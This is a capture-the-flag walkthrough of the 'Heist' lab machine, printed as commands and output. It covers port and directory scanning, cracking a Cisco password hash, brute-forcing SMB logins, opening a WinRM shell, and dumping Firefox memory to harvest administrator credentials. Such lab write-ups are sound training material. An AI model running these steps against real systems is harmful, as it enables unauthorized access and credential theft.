Heist is a box labeled easy that contains practical enumeration techniques and attack vectors. Initial foothold is achieved by leveraging an improper security configuration. Start by checking what ports are open.
nmap -sS -Pn -A 10.10.10.149
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPCc
445/tcp open microsoft-ds?
Enumerate public files and folders on webserver
# dirb http://10.10.10.149
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Oct 19 18:27:44 2019
URL_BASE: http://10.10.10.149/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.149/ ----
==> DIRECTORY: http://10.10.10.149/attachments/
==> DIRECTORY: http://10.10.10.149/css/
==> DIRECTORY: http://10.10.10.149/images/
==> DIRECTORY: http://10.10.10.149/Images/
+ http://10.10.10.149/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.149/js/
Determine SMB version using metasploit. In this case SMB2 version is 255.2
msf5 auxiliary(scanner/smb/smb2) > exploit
[+] 10.10.10.149:445 - 10.10.10.149 supports SMB 2 [dialect 255.2] and has been online for 3671180 hours
[*] 10.10.10.149:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
CISCO 5 secrets are vulnerable to dictionary attacks. CISCO 5 secret found at http://10.10.10.149/attachments/config.txt is assembled in this format
cisco5.txt
enable_secret:$1$pdQG$o8nrSzsGXeaduXrjlvKc91
Then use John The Ripper is used to bruteforce the pass using wordlist rockyou.txt
# /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt cisco5.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
stealth1agent (enable_secret)
1g 0:00:00:21 DONE (2019-10-22 17:07) 0.04633g/s 162434p/s 162434c/s 162434C/s stealthy001..steak7893
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Create a file with available users, users.txt and a file with available passwords, passwords.txt. Then use metaxploit scanner smb_login to see if any combinarion matches against the samba share discovered with nmap
# msfconsole
msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > set rhost 10.10.10.149
msf5 auxiliary(scanner/smb/smb_login) > set PASS_FILE /root/projects/heist/passwords.txt
msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE /root/projects/heist/users.txt
msf5 auxiliary(scanner/smb/smb_login) > run
[*] 10.10.10.149:445 - 10.10.10.149:445 - Starting SMB login bruteforce
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\Administrator:$uperP@ssword',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\Administrator:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\Administrator:stealth1agent',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\Hazard:$uperP@ssword',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\Hazard:Q4)sJu\Y8qz*A3?d',
[+] 10.10.10.149:445 - 10.10.10.149:445 - Success: '.\Hazard:stealth1agent'
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\admin:$uperP@ssword',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\admin:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\admin:stealth1agent',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\rout3r:$uperP@ssword',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\rout3r:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\rout3r:stealth1agent',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\Admin:$uperP@ssword',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\Admin:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\Admin:stealth1agent',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\Rout3r:$uperP@ssword',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\Rout3r:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\Rout3r:stealth1agent',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\router:$uperP@ssword',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\router:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445 - 10.10.10.149:445 - Failed: '.\router:stealth1agent',
[*] 10.10.10.149:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
We notice one combination is successful
[+] 10.10.10.149:445 - 10.10.10.149:445 - Success: '.\Hazard:stealth1agent'
Using credentials, we list available shares
# smbclient -L 10.10.10.149 -U Hazard
Enter WORKGROUP\Hazard's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.149 failed (Error NT_STATUS_IO_TIMEOUT)
Failed to connect with SMB1 -- no workgroup available
Then list permissions for the shares. IPC appears available to user Hazard
# smbmap -H 10.10.10.149 -u Hazard -p stealth1agent
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.149...
[+] IP: 10.10.10.149:445 Name: 10.10.10.149
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ READ ONLY
Further enumerate using enum4linux. It revels a few more uses which we feed back into the login scanner
# enum4linux -u Hazard -p stealth1agent -a 10.10.10.149 2>/dev/null
S-1-5-21-4254423774-1266059056-3197185112-1008 SUPPORTDESK\Hazard (Local User)
S-1-5-21-4254423774-1266059056-3197185112-1009 SUPPORTDESK\support (Local User)
S-1-5-21-4254423774-1266059056-3197185112-1012 SUPPORTDESK\Chase (Local User)
Another valid user / pass combination is revealed
[+] 10.10.10.149:445 - 10.10.10.149:445 - Success: '.\Chase:Q4)sJu\Y8qz*A3?d'
user: Chase
pass: Q4)sJu\Y8qz*A3?d
Connect using evil-winrm and newly discovered credentials
# ./evil-winrm.rb -i 10.10.10.149 -u Chase -p 'Q4)sJu\Y8qz*A3?d'
Evil-WinRM shell v1.8
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents>
Get user hash
*Evil-WinRM* PS C:\Users\Chase\Desktop> cat user.txt
a127daef77ab6d9d92008653295f59c4
Upload procdump64 to the host https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
Observe PIDs of firefox process running on the host
*Evil-WinRM* PS C:\Users\Chase\Documents\vrs> ps|findstr fire
358 25 16100 279180 1.28 6424 1 firefox
390 31 38912 305376 34.13 6488 1 firefox
1134 69 127720 465632 38.45 6624 1 firefox
343 19 10008 266232 0.83 6760 1 firefox
408 31 16964 294960 1.59 7104 1 firefox
Execute dump of one of the Firefox processes. It will dump around 450MB
Procdump64 option -ma indicates writing a 'Full' dump file.
-ma Write a 'Full' dump file.
Includes All the Image, Mapped and Private memory.
./procdump64.exe -accepteula -ma 6624
ProcDump v9.0 - Sysinternals process dump utility
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[02:07:24] Dump 1 initiated: C:\Users\Chase\Documents\vrs\firefox.exe_191028_020724.dmp
[02:07:25] Dump 1 writing: Estimated dump file size is 467 MB.
[02:07:28] Dump 1 complete: 468 MB written in 3.7 seconds
[02:07:28] Dump count reached.
Search contents for string 'admin' and observe a new set of credentials
*Evil-WinRM* PS C:\Users\Chase\Documents\vrs> Get-Content firefox.exe_191028_020724.dmp | Select-Sting 'admin'
ååååååxhttp://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=åååååååååååååååååååååxjar:file:///C:/Program%20Files/Mozilla%20Firefox/browser/omni.ja!/modules/UrlbarValueFormatter.jsmåååååååå
u: admin@support.htb
p: 4dD!5}x/re8]FBuZ
Initiate a connection using newly found credentials. Read the key for root user, found on the user’s desktop
root@kali:~/projects/heist/evil-winrm# ./evil-winrm.rb -i 10.10.10.149 -u Administrator -p '4dD!5}x/re8]FBuZ'
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
50dfa3c6bfd20e2e0d071b073d766897